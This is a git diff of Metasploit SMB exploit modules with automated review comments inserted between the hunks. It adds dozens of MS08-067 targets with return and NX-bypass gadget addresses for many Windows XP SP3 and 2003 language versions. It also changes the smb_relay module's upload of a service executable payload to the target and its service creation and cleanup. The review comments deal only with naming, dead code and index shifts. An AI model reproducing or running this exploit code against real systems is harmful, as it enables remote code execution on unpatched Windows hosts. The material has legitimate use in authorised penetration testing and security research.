diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index bc87447324..dd37029b98 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -387,12 +387,12 @@ module Exploit::Remote::SMB [ Rex::Text.to_unicode('Remotedrucker') ], - 'Portugese - Brazilian' => + 'Portuguese - Brazilian' => [ Rex::Text.to_unicode('Impr. remotas Windows NT'), Rex::Text.to_unicode('Impressoras remotas do Windows NT') ], - 'Portguese' => + 'Portuguese' => [ Rex::Text.to_unicode('Imp. remotas do Windows NT') ], diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index 1fbda45d7f..2bd89b9e16 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -66,7 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote # Automatic targetting via fingerprinting # [ 'Automatic Targeting', { 'auto' => true } ], - + + + # + # UNIVERSAL TARGETS + # + # # Antoine's universal for Windows 2000 # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET @@ -82,16 +87,18 @@ class Metasploit3 < Msf::Exploit::Remote # Standard return-to-ESI without NX bypass # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET # - [ 'Windows XP SP0/SP1 Universal (NO NX)', + [ 'Windows XP SP0/SP1 Universal', { 'Ret' => 0x01001361, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE - + # - # Metasploit's NX bypass for XP SP2/SP3 - # + # ENGLISH TARGETS + # + + # Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 English (NX)', { 'Ret' => 0x6f88f727, 
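Review bot: Renaming the target to `'Windows XP SP0/SP1 Universal'` drops the `(NO NX)` suffix while the comment directly above it still reads "Standard return-to-ESI without NX bypass" and the 2003 entries added in the next hunk keep their `(NO NX)` suffix, so the table's naming convention is no longer consistent. Either keep the suffix, `[ 'Windows XP SP0/SP1 Universal (NO NX)',`, or extend the comment to say why the universal entries are labelled differently from the other non-bypass rows. The enclosing targets array begins and ends outside this hunk.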
@@ -100,9 +107,70 @@ class Metasploit3 < Msf::Exploit::Remote } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 English (NX)', + { + 'Ret' => 0x6f88f807, + 'DisableNX' => 0x6F8917C2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Standard return-to-ESI without NX bypass + [ 'Windows 2003 SP0 English (NO NX)', + { + 'Ret' => 0x71bf175f, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + + # Standard return-to-ESI without NX bypass + [ 'Windows 2003 SP1 English (NO NX)', + { + 'Ret' => 0x71bf21a2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + # Brett Moore's crafty NX bypass for 2003 SP1 + [ 'Windows 2003 SP1 English (NX)', + { + 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL + 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL + 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL + 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL + 'Scratch' => 0x00020408, + } + ], + + # Standard return-to-ESI without NX bypass + [ 'Windows 2003 SP2 English (NO NX)', + { + 'Ret' => 0x71bf3969, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + # Brett Moore's crafty NX bypass for 2003 SP2 + [ 'Windows 2003 SP2 English (NX)', + { + 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL + 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL + 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL + 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL + 'Scratch' => 0x00020408, + } + ], + + # + # NON-ENGLISH TARGETS + # + + # Metasploit's NX bypass for XP SP2/SP3 - # [ 'Windows XP SP2 French (NX)', { 'Ret' => 0x595bf727, @@ -127,7 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit's NX bypass for XP SP2/SP3 # Target provided by Ramon de C. Valle # - [ 'Windows XP SP2 Portuguese (Brazil) (NX)', + [ 'Windows XP SP2 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff727, 'DisableNX' => 0x597016e2, 
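Review bot: Moving the 2003 SP0/SP1/SP2 and XP SP3 English entries up into the new ENGLISH TARGETS section shifts the array index of every target below them, and the file's own `Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET` comments show that at least some positions in this table are relied upon; if anything selects a target by number (saved resource scripts, documentation, or the automatic-targeting code outside this hunk), that dependency should be checked or the shift called out in the commit message. The same edit removes the closing `#` of the French target's comment frame, leaving `# Metasploit's NX bypass for XP SP2/SP3` without the `#` lines the other framed comments keep, and the two consecutive blank `+` lines between the 2003 SP0 and SP1 rows differ from the single blank line used elsewhere. The targets array starts and ends outside this hunk, and the matching removal of the moved entries is in the `@@ -168,19 +236,7 @@` hunk.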
@@ -150,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit's NX bypass for XP SP2/SP3 # Target provided by sunwear # - [ 'Windows XP SP2 Chinese - Traditional (NX)', + [ 'Windows XP SP2 Chinese - Simplified (NX)', { 'Ret' => 0x58fcda43, 'DisableNX' => 0x58fc16e2, @@ -168,19 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Scratch' => 0x00020408, } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # - # Metasploit's NX bypass for XP SP2/SP3 - # - [ 'Windows XP SP3 English (NX)', - { - 'Ret' => 0x6f88f807, - 'DisableNX' => 0x6F8917C2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # + # # Metasploit's NX bypass for XP SP2/SP3 # Target provided by Ulises2k # 
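Review bot: The `'Windows XP SP2 Chinese - Traditional (NX)'` row is relabelled `'Windows XP SP2 Chinese - Simplified (NX)'` with its `Ret` and `DisableNX` values untouched, but nothing in the hunk records why the original label was wrong; only the `# Target provided by sunwear` attribution remains. A one-line comment such as `# Label corrected from Traditional to Simplified; see <SOURCE-OF-CORRECTION>` would stop a later maintainer from reverting it, particularly since this commit also adds separate SP3 Simplified and Traditional rows further down. The enclosing targets array extends beyond this hunk.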
@@ -203,74 +259,191 @@ class Metasploit3 < Msf::Exploit::Remote } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Russian (NX)', + { + 'Ret' => 0x6fe1f807, + 'DisableNX' => 0x6fe217c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + # Same as Russian + [ 'Windows XP SP3 Czech (NX)', + { + 'Ret' => 0x6fe1f807, + 'DisableNX' => 0x6fe217c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Turkish (NX)', + { + 'Ret' => 0x5a78f807, + 'DisableNX' => 0x5a7917c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Swedish (NX)', + { + 'Ret' => 0x597af807, + 'DisableNX' => 0x597b17c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Portuguese (NX)', + { + 'Ret' => 0x596bf807, + 'DisableNX' => 0x596c17c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by Ramon de C. Valle - # - [ 'Windows XP SP3 Portugese - Brazilian (NX)', + # Target provided by Ramon de C. 
Valle + [ 'Windows XP SP3 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff807, 'DisableNX' => 0x597017c2, 'Scratch' => 0x00020408, } ], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL - - # - # Standard return-to-ESI without NX bypass - # - [ 'Windows 2003 SP0 English (NO NX)', + + # Metasploit's NX bypass for XP SP2/SP3 + # Same as Portuguese + [ 'Windows XP SP3 Italian (NX)', { - 'Ret' => 0x71bf175f, - 'Scratch' => 0x00020408, + 'Ret' => 0x596bf807, + 'DisableNX' => 0x596c17c2, + 'Scratch' => 0x00020408, } - ], # JMP ESI WS2HELP.DLL + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Polish (NX)', + { + 'Ret' => 0x5941f807, + 'DisableNX' => 0x594217c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # - # Standard return-to-ESI without NX bypass - # - [ 'Windows 2003 SP1 English (NO NX)', + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Norwegian (NX)', { - 'Ret' => 0x71bf21a2, - 'Scratch' => 0x00020408, + 'Ret' => 0x597cf807, + 'DisableNX' => 0x597d17c2, + 'Scratch' => 0x00020408, } - ], # JMP ESI WS2HELP.DLL - - # - # Standard return-to-ESI without NX bypass - # - [ 'Windows 2003 SP2 English (NO NX)', - { - 'Ret' => 0x71bf3969, - 'Scratch' => 0x00020408, - } - ], # JMP ESI WS2HELP.DLL + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # - # Brett Moore's crafty NX bypass for 2003 SP1 - # - [ 'Windows 2003 SP1 English (NX)', + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Korean (NX)', { - 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL - 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL - 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL - 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL - 'Scratch' => 0x00020408, + 'Ret' => 0x6fd6f807, + 'DisableNX' => 0x6fd717c2, + 'Scratch' => 0x00020408, } - ], - - # - # Brett Moore's crafty NX bypass for 2003 SP2 - # - [ 'Windows 2003 SP2 English (NX)', + ], # JMP ESI 
ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Japanese (NX)', { - 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL - 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL - 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL - 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL - 'Scratch' => 0x00020408, + 'Ret' => 0x567fd4d2, + 'DisableNX' => 0x568017c2, + 'Scratch' => 0x00020408, } - ] - + ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Hungarian (NX)', + { + 'Ret' => 0x5970f807, + 'DisableNX' => 0x597117c2, + 'Scratch' => 0x00020408, + } + ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Hebrew (NX)', + { + 'Ret' => 0x5940f807, + 'DisableNX' => 0x594117c2, + 'Scratch' => 0x00020408, + } + ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Finnish (NX)', + { + 'Ret' => 0x597df807, + 'DisableNX' => 0x597e17c2, + 'Scratch' => 0x00020408, + } + ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Greek (NX)', + { + 'Ret' => 0x592af807, + 'DisableNX' => 0x592b17c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Danish (NX)', + { + 'Ret' => 0x5978f807, + 'DisableNX' => 0x597917c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Chinese - Simplified (NX)', + { + 'Ret' => 0x58fbf807, + 'DisableNX' => 0x58fc17c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Chinese - Traditional (NX)', + { + 'Ret' => 0x5860f807, + 
'DisableNX' => 0x586117c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + # Same as Chinese Traditional + [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)', + { + 'Ret' => 0x5860f807, + 'DisableNX' => 0x586117c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Arabic (NX)', + { + 'Ret' => 0x6fd8f807, + 'DisableNX' => 0x6fd917c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + # # Missing Targets # Key: T=TODO ?=UNKNOWN U=UNRELIABLE diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index ff1895213d..898e260b6b 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -191,7 +191,6 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Exception => e end - ## # OpenServiceW ## @@ -210,13 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - - - # print_line(" ") - # print_status("You *MUST* manually remove the service: (#{servicename} - \"#{displayname}\")") - # print_status("You *MUST* manually delete the service file: %SYSTEMROOT%\\#(unknown)") - # print_line(" ") - + ## # StartService() ## @@ -234,12 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote return end - - ## - # Give the process time to initialize - ## - print_status("Waiting on process to initialize...") - ## # DeleteService() ## @@ -254,7 +241,6 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") end - ## # CloseHandle() ## @@ -265,7 +251,6 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") end - print_status("Deleting \\#(unknown)...") simple.connect("ADMIN$") simple.delete("\\#(unknown)") 
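Review bot: Several of the added targets are literal copies of another row's hash — Czech is marked `# Same as Russian`, Italian `# Same as Portuguese`, and Chinese - Traditional / Taiwan `# Same as Chinese Traditional` — so a future correction to one address set must be made in two places and the pairs can silently drift apart. Defining the shared hash once (a frozen constant or a local built before the info hash) and referencing it from both rows keeps the duplicates in lock-step without changing any target name. The trailing comments on the new SP3 rows also alternate between `JMP ESI`, `PUSH ESI; RET` and `CALL ESI` while every row carries the identical `# Metasploit's NX bypass for XP SP2/SP3` header, so the distinguishing information lives only in the trailing comment; a sentence in the section comment explaining that convention would help. This hunk contains the end of the targets array, but the array itself starts outside it.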
diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index a15561e107..0afec95ff4 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Uploading payload...") filename = rand_text_alpha(8) + ".exe" fd = rclient.open("\\#(unknown)", 'rwct') - fd << Rex::Text.to_win32pe(code.encoded) + fd << Rex::Text.to_win32pe_service(code.encoded,rand_text_alpha(8)) fd.close print_status("Created \\#(unknown)...") @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote ## servicename = rand_text_alpha(8) - displayname = 'M' + rand_text_alpha(rand(32)+1) + displayname = rand_text_alpha(rand(32)+1) svc_handle = nil svc_status = nil @@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Remote NDR.long(0) + # Password NDR.long(0) + # Password NDR.long(0) + # Password - NDR.long(0) # Password + NDR.long(0) # Password begin response = dcerpc.call(0x0c, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) @@ -226,11 +226,6 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - - print_line(" ") - print_status("You *MUST* manually remove the service: #{smb[:rhost]} (#{servicename} - \"#{displayname}\")") - print_status("You *MUST* manually delete the service file: #{smb[:rhost]} %SYSTEMROOT%\\#(unknown)") - print_line(" ") ## # StartService() 
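Review bot: The new call `fd << Rex::Text.to_win32pe_service(code.encoded,rand_text_alpha(8))` is missing the space after the comma used in every other argument list in this file; `fd << Rex::Text.to_win32pe_service(code.encoded, rand_text_alpha(8))`. Its second argument is a fresh random string that is not retained, while the `@@ -164,7 +164,7 @@` hunk later derives `servicename` from a separate `rand_text_alpha(8)`; a short comment stating whether the two are meant to be independent would save the next reader from assuming one of them is a mistake. The enclosing method continues outside this hunk.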
@@ -249,7 +244,33 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") end - handler(smb[:rsock]) + ## + # DeleteService() + ## + print_status("Removing the service...") + stubdata = + svc_handle + begin + response = dcerpc.call(0x02, stubdata) + if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) + end + rescue ::Exception => e + print_status("Error: #{e}") + end + + ## + # CloseHandle() + ## + print_status("Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception => e + print_status("Error: #{e}") + end + + print_status("Deleting \\#(unknown)...") + simple.connect("ADMIN$") + simple.delete("\\#(unknown)") end @@ -324,7 +345,6 @@ class Metasploit3 < Msf::Exploit::Remote target_host = smb[:ip] end - rsock = nil rport = nil [445, 139].each do |rport| @@ -362,7 +382,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Could not negotiate NTLMv1 with #{target_host}:#{rport} #{e.class} #{e.to_s}") raise e end - if (not rclient.client.challenge_key) print_error("No challenge key received from #{smb[:ip]}:#{rport}") @@ -494,4 +513,4 @@ class Metasploit3 < Msf::Exploit::Remote c.put(pkt.to_s) end -end \ No newline at end of file +end
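Review bot: In the added DeleteService block `response = dcerpc.call(0x02, stubdata)` is assigned but never read, and the following `if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) end` has an empty body, so both are dead code carried over from psexec.rb; drop the `response =` and the empty `if`, or give the `if` the status handling it was evidently meant to perform. Both new `rescue ::Exception => e` clauses also catch `Interrupt` and `SystemExit`, so a Ctrl-C during cleanup is printed as `Error:` and swallowed; `rescue ::StandardError => e` is the narrower form. The payload was written through `rclient.open` in the first hunk of this file, but the cleanup here calls `simple.connect("ADMIN$")` and `simple.delete(...)`; if `simple` is the module's own SMB client rather than the relayed session, the delete runs against a different connection, which looks worth confirming. The replaced `handler(smb[:rsock])` call has no successor in the hunk; if its removal is intentional the commit message should say so. The enclosing method ends at the `end` visible in this hunk but begins outside it.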